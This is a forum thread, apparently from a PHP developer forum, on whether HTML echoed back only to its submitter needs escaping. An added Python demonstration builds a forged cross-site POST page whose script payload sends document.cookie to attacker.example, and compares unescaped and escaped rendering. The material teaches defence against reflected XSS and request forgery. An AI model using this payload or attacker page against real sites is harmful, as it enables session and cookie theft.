need to sanitize?
Maugrim_The_Reaper wrote:
User enters HTML, HTML is not stored (even temp), same user is the only one capable of seeing their own HTML.
What's to sanitise?
Unless the data is eval'd, outputted to another user, or stored I see no reason...

Hard to explain, it's down to my own ethics I guess. It's not a case of better safe than sorry, it's more a case of just not wanting my site to be involved in any form of attack, be it a 'suicide' as would happen in this scenario, or used to attack other users.
Ambush Commander (DevNet Master) wrote:
Maugrim_The_Reaper wrote:
User enters HTML, HTML is not stored (even temp), same user is the only one capable of seeing their own HTML.
What's to sanitise?
Unless the data is eval'd, outputted to another user, or stored I see no reason...

Here's an idea. Guy makes joke website that has a big, red, fluffy DO NOT PRESS button. Obviously, people press it.
What the form does is send the system you describe evil HTML, which the server gurgles back. Bang, compromise.
Sure, you could check referrers or use challenges to stop request forging, but wouldn't it be a lot nicer just to do the darn thing properly? (or htmlentity-ize the whole thing)
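To make the "DO NOT PRESS" scenario concrete, here is an added example; it is not code from the thread (nobody in the thread posted any) and it is not anyone's site. It assumes a preview endpoint at https://victim.example/preview.php that takes a form field named body and echoes it back, and it uses Python's html.escape as the stand-in for PHP's htmlspecialchars/htmlentities. The attacker page, the payload and the field name are constructed for the demonstration.

```python
"""Reflected HTML "preview" endpoint: the thread's unescaped version beside
the escaped fix, driven by a forged cross-site form POST.

Added example. Every name here (render_preview, handle_preview_post,
ATTACKER_PAGE, the field name "body", the hosts) is an assumption made for
illustration; the thread posts no code.
"""
import html
from urllib.parse import parse_qs, urlencode

# What the joke page submits on the victim's behalf. The payload is chosen so
# the demo can check whether a raw <script> tag reaches the rendered page.
PAYLOAD = ("<script>new Image().src='https://attacker.example/c?'"
           "+document.cookie</script>")

# Constructed sample: a page hosted on the attacker's own site. A browser that
# loads it sends an ordinary form POST to the victim site's preview endpoint,
# and the victim's cookies for that site ride along; nothing in the HTML form
# model stops a cross-origin POST. The value attribute is entity-encoded, so
# the browser submits the literal "<script>...</script>" text.
ATTACKER_PAGE = f"""<html><body>
<form id="f" method="POST" action="https://victim.example/preview.php">
  <input type="hidden" name="body" value="{html.escape(PAYLOAD, quote=True)}">
  <input type="submit" value="DO NOT PRESS">
</form>
<script>document.getElementById('f').submit();</script>
</body></html>"""


def attacker_request_body() -> str:
    """The application/x-www-form-urlencoded body the browser sends."""
    return urlencode({"body": PAYLOAD})


def render_preview(body: str, escape: bool) -> str:
    """Build the page that echoes the submission back to whoever submitted it.

    escape=False is the "only the author sees it, nothing to sanitise" version
    from the thread; escape=True is the htmlentities fix. Either way the page
    is served from victim.example, so anything active in it runs with that
    site's cookies and DOM, in the browser that was tricked into posting.
    """
    shown = html.escape(body, quote=True) if escape else body
    return f"<html><body><h1>Your preview</h1><div>{shown}</div></body></html>"


def handle_preview_post(raw_form_body: str, escape: bool) -> str:
    """Parse the POST body and render the preview, as preview.php would."""
    fields = parse_qs(raw_form_body, keep_blank_values=True)
    body = fields.get("body", [""])[0]
    return render_preview(body, escape)


def contains_active_markup(page: str) -> bool:
    """Crude demo check: did an unescaped <script> tag survive into the page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    req = attacker_request_body()
    print("unescaped:", handle_preview_post(req, escape=False))
    print("escaped:  ", handle_preview_post(req, escape=True))
```

The submitter is not the victim here: the person whose browser runs the script never typed the HTML, they only visited the joke page. A Referer check or a per-session token on the form would stop the forged POST, but encoding the output is what removes the bug itself, and it keeps working when the request arrives by some route the token check did not anticipate.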
RobertGonzalez (Site Administrator) wrote:
Everah wrote:
I don't think sanitizing is necessary. I might consider running it through an HTML entity conversion for safety's sake, but essentially the post data will reside in temporary space seeing as the posted data will be immediately displayed on screen to the user that posted it. If anyone is going to be affected by it, it will be the person that posted it.

Hey hey, maybe that wasn't such a stupid idea? Eh?